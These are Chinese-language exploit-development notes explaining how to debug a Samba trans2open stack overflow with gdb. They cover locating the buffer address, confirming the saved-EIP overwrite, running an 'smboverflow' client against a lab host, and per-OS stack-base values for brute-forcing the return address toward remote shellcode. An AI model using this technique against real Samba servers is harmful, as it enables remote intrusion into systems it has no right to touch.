☆ 漏洞调试技巧漏洞调试技巧比较杂乱，仅仅作为笔记、备忘出现，非正式文档。 1) 在Debian/Linux中利用gdb确认fname_address 在Debian上执行"smbd -D"启动Samba Server。由于smbd采用父子进程处理方式，不要直接调试父进程，gdb在fork()分叉处"直接跟随"子进程时有问题。变通的办法有很多，先用"gdb ./smboverflow"启动客户端，在发送TRANSACT2_OPEN报文之前设置一个断点，然后"r -d 192.168.7.148 -f 0xbffff000"执行客户端。客户端会中断在预设断点处。如果客户端源代码可控，也可不用gdb启动客户端，程序自己控制在何处暂停一下。对于服务端，由于已经建立空会话，子进程出现，"ps auwx | grep smbd"找出子进程PID，执行"gdb smbd "调试子进程。Debian自带smbd的所有符号信息都被去除，"disas main"也会失败。执行"backtrace"查看堆栈回溯时，所出现的符号信息绝不可信(已经乱套了)，只能相信地址本身。由于事先在RedHat/Linux上编译、调试过Samba Server源码，已经有一些初步知识， fname[1024]在栈区，fname_address位于[0xbffff000,0xbffffff0]之间的可能性极大，位于[0xbfffe000,0xbffff000]之间的可能性极小。察看服务端当前栈帧: (gdb) i r esp ebp esp 0xbffff794 0xbffff794 ebp 0xbffff85c 0xbffff85c fname_address应该低于0xbffff794，在0xbffff400处设置监视点: (gdb) x/wx 0xbffff400 0xbffff400: 0x0804c086 (gdb) watch (*(unsigned int *)0xbffff400==0x90909090) (gdb) c 执行"StrnCpy( fname, pname, namelen );"时，fname[]中出现大量0x90(NOP指令)。假设0xbffff400位于fname[]中部，执行Strncpy()时，该处的值将变成0x90909090，监视点被命中，程序就会中断下来。watch与SoftICE中的BPM类似，使用DR0-DR3调试寄存器，属于硬件断点。现在回到客户端，执行"c"，发送TRANSACT2_OPEN报文。服务端由于监视点被命中而中断下来: (gdb) x/wx 0xbffff400 0xbffff400: 0x90909090 (gdb) x/10i $eip 0x8113d69 : inc %ecx 0x8113d6a : inc %edx 0x8113d6b : test %al,%al 0x8113d6d : jne 0x8113d60 0x8113d6f : movb $0x0,(%edx) 0x8113d72 : mov %esi,%eax 0x8113d74 : pop %ebx 0x8113d75 : pop %esi 0x8113d76 : leave 0x8113d77 : ret (gdb) 显然这在Strncpy()函数中，不要相信此时的符号信息。查看其返回地址、各个形参: (gdb) x/4wx $ebp+4 0xbffff340: 0x0806e65b 0xbffff3fc 0x0820518c 0x00000449 已经找出fname_address，就是0xbffff3fc。查看call_trans2open()的栈帧: (gdb) x/wx $ebp 0xbffff33c: 0xbffff7fc 0xbffff7fc是call_trans2open()中EBP寄存器的值。注意，fname_address加上1024 字节就等于0xbffff7fc了。这与前面所绘内存布局图有出入，中间那些局部变量不见了，比如namelen、pname等等。这里介绍另一个技巧，如何进行内存搜索: (gdb) define find <- 尖括号部分不要输入 set $count=0 set $find_result=$arg0 while ((((unsigned int)$count)<((unsigned int)$arg3))&&(((unsigned int)$find_result)<=((unsigned int)$arg1))) if (*(unsigned int *)$find_result==$arg4) set $count=$count+1 x/wx $find_result end set $find_result=$find_result+$arg2 end end (gdb) find 0xbffff000 0xbfffff00 4 16 0x90909090 <- 后面直接使用find就可以了 0xbffff3fc: 0x90909090 0xbffff400: 0x90909090 (gdb) find 0xbffff000 0xbfffff00 4 8 0x0820518c <- 搜索pname变量位置 0xbffff348: 0x0820518c OpenBSD 3.0自带的gdb 4.16.1要求我们必须对参与大小比较的各个变量进行强制类型转换，否则行为怪异，达不到预期目的。高版本的gdb不再需要进行强制类型转换，为了保持向后兼容性，这里仍然使用了强制类型转换。 0xbffff348是Strncpy()的形参位置。按常规理解应该还有一处地址存放0x0820518c，那才是pname变量位置，但现在没找到。查看0x0806e65b前后的指令并对照trans2.c 源码，发现局部变量pname只在Strncpy()处使用了一次，很可能Debian中编译smbd时打开了优化开关，导致pname只以寄存器变量形式出现，未出现在call_trans2open() 的栈帧中。这与RedHat的情形不一样，以后编写、调试exploit code时，应该注意类似问题。不断执行"x/20i 0x0806e65b"，直至找到类似这样的汇编代码序列: 0x806e962 : pop %ebx 0x806e963 : pop %esi 0x806e964 : pop %edi 0x806e965 : leave 0x806e966 : ret 最后的ret指令就是call_trans2open()的最后一条返回指令，在此设置断点: (gdb) delete 1 (gdb) b *0x806e966 Breakpoint 2 at 0x806e966 (gdb) c Continuing. Breakpoint 2, 0x0806e966 in chroot () (gdb) x/5wx $esp-4 0xbffff7fc: 0xbffff0d0 0xbffff1b0 0xbffff0d0 0xbffff1b0 0xbffff80c: 0xbffff0d0 Original EBP、Original EIP、outbuf均被覆盖。由于客户端猜测的fname_address 是0xbffff000，因此Original EIP被覆盖成0xbffff1b0。而实际的fname_address从 0xbffff3fc开始，0xbffff1b0在NOP区外(内存低端)，此次攻击必然失败。 (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0xbffff215 in ?? () (gdb) 现在回到客户端，执行"./smboverflow -d 192.168.7.148 -f 0xbffff3fc"即可溢出成功。这次我们运气好，设置watch监视点时正好位于fname[]中，一次命中。如果未命中，也不要紧，等收到SIGSEGV信号后用find找出NOP区，再来一次就可以了。当然在真实攻击中，我们不可能去目标主机上运行gdb，介绍上述技巧的目的只是便于编写、调试exploit code，确定从何处开始暴力猜测fname_address等等。这种技术同样适用于x86/FreeBSD，其fname_address应该从0xbfbff000开始暴力猜测。对于x86/Solaris，其fname_address应该从0x08047000开始暴力猜测。这些值有一个共同的特点，等于各自系统的栈底减去0x1000: x86/Linux 栈底是0xc0000000 (栈底往低地址的4个字节总是零) SPARC/Solaris 7/8 栈底是0xffbf0000 (栈底往低地址的4个字节总是零) SPARC/Solaris 2.6 栈底是0xf0000000 (栈底往低地址的4个字节总是零) x86/Solaris 8 栈底是0x08048000 x86/FreeBSD 栈底是0xbfc00000 (栈底往低地址的4个字节总是零) x86/NetBSD 1.5 栈底是0xbfbfe000 x86/OpenBSD 2.8/3.0 栈底是0xdfbfe000 编写smboverflow.c的工作简化成两步，调试出各个平台的远程shellcode，利用"2.4 如何编程获取栈底地址"中gstack.c获取栈底地址并减去0x1000作为暴力猜测的起始地址。